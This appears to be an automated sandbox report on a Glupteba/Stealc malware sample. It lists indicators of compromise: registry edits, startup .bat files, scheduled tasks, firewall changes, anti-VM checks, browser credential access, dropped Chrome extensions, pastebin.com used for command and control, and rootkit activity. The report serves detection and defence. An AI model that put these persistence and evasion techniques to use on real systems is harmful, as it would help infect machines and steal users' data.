glupteba | d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4

Windows Service

T1543.003

Processes:

XrPxlDIYiTy2ckRQ7B7AEfDZ.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	XrPxlDIYiTy2ckRQ7B7AEfDZ.exe

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

XrPxlDIYiTy2ckRQ7B7AEfDZ.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ XrPxlDIYiTy2ckRQ7B7AEfDZ.exe
Blocklisted process makes network request 2 IoCs

Processes:

rundll32.exemsiexec.exe

flow pid process

74 1152 rundll32.exe
78 3832 msiexec.exe
Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 2 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exe

pid process

3244 netsh.exe
3124 netsh.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	XrPxlDIYiTy2ckRQ7B7AEfDZ.exe

flow	pid	process
74	1152	rundll32.exe
78	3832	msiexec.exe

pid	process
3244	netsh.exe
3124	netsh.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

XrPxlDIYiTy2ckRQ7B7AEfDZ.exeInstall.exerundll32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	XrPxlDIYiTy2ckRQ7B7AEfDZ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	XrPxlDIYiTy2ckRQ7B7AEfDZ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

SPYXfri.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\International\Geo\Nation	SPYXfri.exe

Drops startup file 8 IoCs

Processes:

regasm.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vLxMkquwj2YLyeMbPWIrM04m.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Lma0w8jNTTBEKB4j2ImfhlKl.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BJcupLuUarzm5XXQzG6ujYry.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9XtibT4Yf4gH04TbrqAhIOG1.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\e3y42iPJ08drhXOmj3ez4uBU.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BwNhJ3ZI8lFiFlan3IJP72hk.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iLLA17oZmuYEQ42ykMCFYANl.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4vHWCNg1n0gUuFSrnQ517HiF.bat	regasm.exe

Executes dropped EXE 26 IoCs

Processes:

B8Ng9DuIJgnvrbMHtNWim1HP.exeu2dg.0.exez3XO3y8eiP2BsC1smWlI5r5w.exeGjI6ioR6cLVRryk8D6Bj6r6Y.exeXrPxlDIYiTy2ckRQ7B7AEfDZ.exez3XO3y8eiP2BsC1smWlI5r5w.exeGjI6ioR6cLVRryk8D6Bj6r6Y.exeOYYF9HTQ5SJVtUftEvg2Vczg.exe3BVFDXkt09D3q0LgQVE6DprB.exe3BVFDXkt09D3q0LgQVE6DprB.exe3BVFDXkt09D3q0LgQVE6DprB.exe3BVFDXkt09D3q0LgQVE6DprB.exeInstall.exe3BVFDXkt09D3q0LgQVE6DprB.execsrss.exeAssistant_109.0.5097.45_Setup.exe_sfx.exeinjector.exeassistant_installer.exeassistant_installer.exeu2dg.3.exewindefender.exewindefender.exeAIZVKOw.exeSPYXfri.exem2oZU2kuNyXNzQIRlFQBnoBQ.exece-installer_7.14.2_vbox-6.1.20.exe

pid	process
3076	B8Ng9DuIJgnvrbMHtNWim1HP.exe
3400	u2dg.0.exe
3044	z3XO3y8eiP2BsC1smWlI5r5w.exe
3800	GjI6ioR6cLVRryk8D6Bj6r6Y.exe
4544	XrPxlDIYiTy2ckRQ7B7AEfDZ.exe
2884	z3XO3y8eiP2BsC1smWlI5r5w.exe
1300	GjI6ioR6cLVRryk8D6Bj6r6Y.exe
3888	OYYF9HTQ5SJVtUftEvg2Vczg.exe
724	3BVFDXkt09D3q0LgQVE6DprB.exe
2584	3BVFDXkt09D3q0LgQVE6DprB.exe
1100	3BVFDXkt09D3q0LgQVE6DprB.exe
1016	3BVFDXkt09D3q0LgQVE6DprB.exe
2088	Install.exe
1116	3BVFDXkt09D3q0LgQVE6DprB.exe
2172	csrss.exe
4844	Assistant_109.0.5097.45_Setup.exe_sfx.exe
3468	injector.exe
1524	assistant_installer.exe
1272	assistant_installer.exe
1424	u2dg.3.exe
1072	windefender.exe
1460	windefender.exe
244	AIZVKOw.exe
1600	SPYXfri.exe
4564	m2oZU2kuNyXNzQIRlFQBnoBQ.exe
1412	ce-installer_7.14.2_vbox-6.1.20.exe

Loads dropped DLL 10 IoCs

Processes:

3BVFDXkt09D3q0LgQVE6DprB.exe3BVFDXkt09D3q0LgQVE6DprB.exe3BVFDXkt09D3q0LgQVE6DprB.exe3BVFDXkt09D3q0LgQVE6DprB.exe3BVFDXkt09D3q0LgQVE6DprB.exeassistant_installer.exeassistant_installer.exerundll32.exe

pid	process
724	3BVFDXkt09D3q0LgQVE6DprB.exe
2584	3BVFDXkt09D3q0LgQVE6DprB.exe
1100	3BVFDXkt09D3q0LgQVE6DprB.exe
1016	3BVFDXkt09D3q0LgQVE6DprB.exe
1116	3BVFDXkt09D3q0LgQVE6DprB.exe
1524	assistant_installer.exe
1524	assistant_installer.exe
1272	assistant_installer.exe
1272	assistant_installer.exe
1152	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\windefender.exe	upx
behavioral2/memory/1072-686-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral2/memory/1460-743-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral2/memory/1460-784-0x0000000000400000-0x00000000008DF000-memory.dmp	upx

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

Processes:

m2oZU2kuNyXNzQIRlFQBnoBQ.exez3XO3y8eiP2BsC1smWlI5r5w.exeGjI6ioR6cLVRryk8D6Bj6r6Y.execsrss.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	m2oZU2kuNyXNzQIRlFQBnoBQ.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	z3XO3y8eiP2BsC1smWlI5r5w.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	GjI6ioR6cLVRryk8D6Bj6r6Y.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

Processes:

XrPxlDIYiTy2ckRQ7B7AEfDZ.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	XrPxlDIYiTy2ckRQ7B7AEfDZ.exe

Drops Chrome extension 2 IoCs

Processes:

SPYXfri.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	SPYXfri.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json	SPYXfri.exe

Drops desktop.ini file(s) 1 IoCs

Processes:

SPYXfri.exe

description ioc process

File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini SPYXfri.exe

description	ioc	process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	SPYXfri.exe

Enumerates connected drives 3 TTPs 27 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

3BVFDXkt09D3q0LgQVE6DprB.exemsiexec.exe3BVFDXkt09D3q0LgQVE6DprB.exe

description	ioc	process
File opened (read-only)	\??\D:	3BVFDXkt09D3q0LgQVE6DprB.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\D:	3BVFDXkt09D3q0LgQVE6DprB.exe
File opened (read-only)	\??\F:	3BVFDXkt09D3q0LgQVE6DprB.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\F:	3BVFDXkt09D3q0LgQVE6DprB.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

2 pastebin.com
4 pastebin.com
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
rootkit evasion

Processes:

csrss.exe

description ioc process

File opened for modification \??\WinMonFS csrss.exe

flow	ioc
2	pastebin.com
4	pastebin.com

description	ioc	process
File opened for modification	\??\WinMonFS	csrss.exe

Drops file in System32 directory 42 IoCs

Processes:

SPYXfri.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeAIZVKOw.exepowershell.exepowershell.exeXrPxlDIYiTy2ckRQ7B7AEfDZ.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	SPYXfri.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	SPYXfri.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	SPYXfri.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	SPYXfri.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15	SPYXfri.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	SPYXfri.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	SPYXfri.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91	SPYXfri.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	SPYXfri.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	SPYXfri.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	SPYXfri.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	SPYXfri.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	SPYXfri.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	AIZVKOw.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	SPYXfri.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15	SPYXfri.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	AIZVKOw.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	SPYXfri.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91	SPYXfri.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15	SPYXfri.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	SPYXfri.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306	SPYXfri.exe
File opened for modification	C:\Windows\System32\GroupPolicy	XrPxlDIYiTy2ckRQ7B7AEfDZ.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	XrPxlDIYiTy2ckRQ7B7AEfDZ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	SPYXfri.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306	SPYXfri.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15	SPYXfri.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	XrPxlDIYiTy2ckRQ7B7AEfDZ.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	XrPxlDIYiTy2ckRQ7B7AEfDZ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

XrPxlDIYiTy2ckRQ7B7AEfDZ.exe

pid process

4544 XrPxlDIYiTy2ckRQ7B7AEfDZ.exe

pid	process
4544	XrPxlDIYiTy2ckRQ7B7AEfDZ.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe

description	pid	process	target process
PID 4960 set thread context of 4284	4960	d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe	regasm.exe

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

Processes:

GjI6ioR6cLVRryk8D6Bj6r6Y.exez3XO3y8eiP2BsC1smWlI5r5w.exe

description	ioc	process
File opened (read-only)	\??\VBoxMiniRdrDN	GjI6ioR6cLVRryk8D6Bj6r6Y.exe
File opened (read-only)	\??\VBoxMiniRdrDN	z3XO3y8eiP2BsC1smWlI5r5w.exe

Drops file in Program Files directory 14 IoCs

Processes:

SPYXfri.exe

description	ioc	process
File created	C:\Program Files (x86)\RVqmAwyyxwiU2\LHvjJyj.xml	SPYXfri.exe
File created	C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\GaDkQze.dll	SPYXfri.exe
File created	C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\FaYwZcq.xml	SPYXfri.exe
File created	C:\Program Files (x86)\ARTXeDTAxvUn\ILNjVYD.dll	SPYXfri.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	SPYXfri.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	SPYXfri.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	SPYXfri.exe
File created	C:\Program Files (x86)\ByWuwrOBU\WnleIRa.xml	SPYXfri.exe
File created	C:\Program Files (x86)\DUGaRsFaSnqjC\qaeykIa.dll	SPYXfri.exe
File created	C:\Program Files (x86)\DUGaRsFaSnqjC\OTNmBJT.xml	SPYXfri.exe
File created	C:\Program Files (x86)\ByWuwrOBU\ojTVpK.dll	SPYXfri.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	SPYXfri.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	SPYXfri.exe
File created	C:\Program Files (x86)\RVqmAwyyxwiU2\BoPjNTTVXpgKP.dll	SPYXfri.exe

Drops file in Windows directory 13 IoCs

Processes:

csrss.exeschtasks.exez3XO3y8eiP2BsC1smWlI5r5w.exeschtasks.exeGjI6ioR6cLVRryk8D6Bj6r6Y.exeschtasks.exemsiexec.exeschtasks.exe

description	ioc	process
File opened for modification	C:\Windows\windefender.exe	csrss.exe
File created	C:\Windows\Tasks\QhciBzJOokLnyYZub.job	schtasks.exe
File opened for modification	C:\Windows\rss	z3XO3y8eiP2BsC1smWlI5r5w.exe
File created	C:\Windows\windefender.exe	csrss.exe
File created	C:\Windows\Tasks\qbSDwEgyNYPZlGA.job	schtasks.exe
File created	C:\Windows\rss\csrss.exe	z3XO3y8eiP2BsC1smWlI5r5w.exe
File created	C:\Windows\rss\csrss.exe	GjI6ioR6cLVRryk8D6Bj6r6Y.exe
File created	C:\Windows\Tasks\BAnwxolbGpCzXNxkj.job	schtasks.exe
File opened for modification	C:\Windows\Installer\e5991a7.msi	msiexec.exe
File created	C:\Windows\Installer\e5991a7.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File created	C:\Windows\Tasks\bWycNackLSywaqkmgR.job	schtasks.exe
File opened for modification	C:\Windows\rss	GjI6ioR6cLVRryk8D6Bj6r6Y.exe

Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exe

pid process

244 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

1404 3400 WerFault.exe u2dg.0.exe
3716 3076 WerFault.exe B8Ng9DuIJgnvrbMHtNWim1HP.exe

pid	process
244	sc.exe

pid	pid_target	process	target process
1404	3400	WerFault.exe	u2dg.0.exe
3716	3076	WerFault.exe	B8Ng9DuIJgnvrbMHtNWim1HP.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

u2dg.3.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u2dg.3.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u2dg.3.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u2dg.3.exe

Creates scheduled task(s) 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
2768	schtasks.exe
448	schtasks.exe
4224	schtasks.exe
4608	schtasks.exe
1272	schtasks.exe
1892	schtasks.exe
3532	schtasks.exe
1904	schtasks.exe
4852	schtasks.exe
4564	schtasks.exe
4820	schtasks.exe
4796	schtasks.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

System Information Discovery

Processes:

Install.exerundll32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

GjI6ioR6cLVRryk8D6Bj6r6Y.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exewindefender.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeSPYXfri.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)"	GjI6ioR6cLVRryk8D6Bj6r6Y.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time"	GjI6ioR6cLVRryk8D6Bj6r6Y.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-162 = "Central Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time"	GjI6ioR6cLVRryk8D6Bj6r6Y.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-251 = "Dateline Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-981 = "Kamchatka Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-571 = "China Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-601 = "Taipei Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time"	GjI6ioR6cLVRryk8D6Bj6r6Y.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time"	GjI6ioR6cLVRryk8D6Bj6r6Y.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
